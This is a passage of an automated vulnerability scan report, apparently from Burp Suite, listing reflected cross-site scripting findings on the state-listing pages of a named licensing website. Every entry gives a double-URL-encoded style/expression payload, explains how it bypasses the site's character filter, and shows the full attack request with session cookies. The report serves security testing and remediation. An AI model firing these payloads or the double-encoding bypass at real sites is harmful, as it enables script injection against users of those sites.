GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Maryland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Massachusetts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Michigan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Minnesota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Mississippi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Missouri
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Montana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Montreal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Nebraska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Nevada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Hampshire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Jersey
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Mexico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-York
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/North-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
